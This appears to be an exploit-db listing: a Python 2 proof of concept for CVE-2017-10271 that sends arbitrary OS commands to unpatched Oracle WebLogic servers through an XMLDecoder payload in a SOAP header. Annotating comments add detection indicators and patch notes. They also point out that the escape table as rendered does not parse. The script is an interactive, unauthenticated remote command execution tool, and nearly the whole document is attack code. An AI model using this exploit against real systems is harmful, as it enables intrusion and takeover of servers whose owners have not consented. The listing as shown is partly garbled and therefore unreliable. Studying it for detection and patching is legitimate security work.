Oracle WebLogic Server 10.3.6.0.0 / 12.x – Remote Command Execution

  • 作者: 1337g
    日期: 2017-12-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43392/
  • import requests
    import sys
    
    # Target base URL is taken verbatim from the first CLI argument; no
    # validation or normalisation is done (no scheme check, no trailing-slash
    # handling), and running the script with no argument raises IndexError here.
    url_in = sys.argv[1]
    # Endpoint of the WebLogic wls-wsat component targeted by this
    # CVE-2017-10271 PoC. For defenders: a POST with a text/xml body to
    # /wls-wsat/CoordinatorPortType is the access-log / WAF indicator to alert
    # on. The issue was patched in Oracle's October 2017 Critical Patch Update;
    # restricting or removing the wls-wsat endpoint was the usual interim
    # mitigation (confirm against vendor guidance for your version).
    payload_url = url_in + "/wls-wsat/CoordinatorPortType"
    # The only header sent; the request is otherwise a plain unauthenticated POST.
    payload_header = {'content-type': 'text/xml'}
    
    
    def payload_command (command_in):
        """Build the SOAP envelope used by this CVE-2017-10271 PoC.

        command_in is the OS command typed by the user. It is wrapped in a
        <string> element and embedded in a java.beans.XMLDecoder document that
        is carried inside the WS-AT <work:WorkContext> SOAP *header*; the SOAP
        body is left empty. Returns the complete envelope as one str.
        """
        # NOTE(review): as rendered on this page every value in the table
        # equals its key, and the `"""` in the second entry opens a
        # triple-quoted string, so the listing does not parse as shown. The
        # original presumably used XML entity references that the page
        # renderer collapsed -- confirm against the source listing before
        # relying on any reading of this function.
        html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
        }
        # Per-character substitution through the table above; with the table
        # exactly as shown here the join reproduces command_in unchanged.
        command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
        # Detection note: everything of interest is in the SOAP Header, not the
        # Body -- a WorkContext element wrapping <java class="java.beans.XMLDecoder">,
        # a java.lang.ProcessBuilder void with a 3-element String array
        # ("cmd", "/c", <command>) and a <void method="start"/>. Inspection
        # that only examines the SOAP Body will not see this payload. The
        # hard-coded "cmd" / "/c" prefix means the payload as written only
        # applies to Windows hosts.
        payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
        " <soapenv:Header> " \
        " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
        " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
        " <void class=\"java.lang.ProcessBuilder\"> \n" \
        "<array class=\"java.lang.String\" length=\"3\">" \
        "<void index = \"0\"> " \
        "<string>cmd</string> " \
        "</void>" \
        "<void index = \"1\"> " \
        "<string>/c</string>" \
        "</void>" \
        "<void index = \"2\"> " \
        + command_filtered + \
        "</void>" \
        "</array>" \
        "<void method=\"start\"/>" \
        "</void>" \
        "</java>" \
        "</work:WorkContext>" \
        " </soapenv:Header>" \
        " <soapenv:Body/>" \
        "</soapenv:Envelope>"
        return payload_1
    
    def do_post(command_in):
        """POST the envelope built by payload_command to payload_url and print a verdict.

        Only the HTTP status code is inspected; no response content is read or
        parsed, so this is a blind check: the "Command Executed" message does
        not demonstrate that anything actually ran on the target.
        """
        # No timeout is passed, so an unresponsive host blocks this call
        # indefinitely. requests' default TLS verification applies, and any
        # connection error propagates as an exception to the caller (the
        # interactive loop), ending the script.
        result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)

        # A 500 is treated as success -- presumably the server raised while
        # processing the header (not verified by the code). Every other status
        # is reported as a failure without further distinction.
        if result.status_code == 500:
            print "Command Executed \n"
        else:
            print "Something Went Wrong \n"
    
    
    
    # Banner. The print statement and raw_input below mark this as Python 2
    # code; it will not run unmodified under Python 3.
    print "***************************************************** \n" \
     "**************** Coded By 1337g****************** \n" \
     "*CVE-2017-10271 Blind Remote Command Execute EXP* \n" \
     "***************************************************** \n"

    # Interactive loop: each entered line is sent as one command via do_post.
    # Only the literal "exit" leaves the loop (through the site-provided
    # exit(0)); Ctrl-C and EOF are not handled and propagate as exceptions.
    while 1:
        command_in = raw_input("Eneter your command here: ")
        if command_in == "exit" : exit(0)
        do_post(command_in)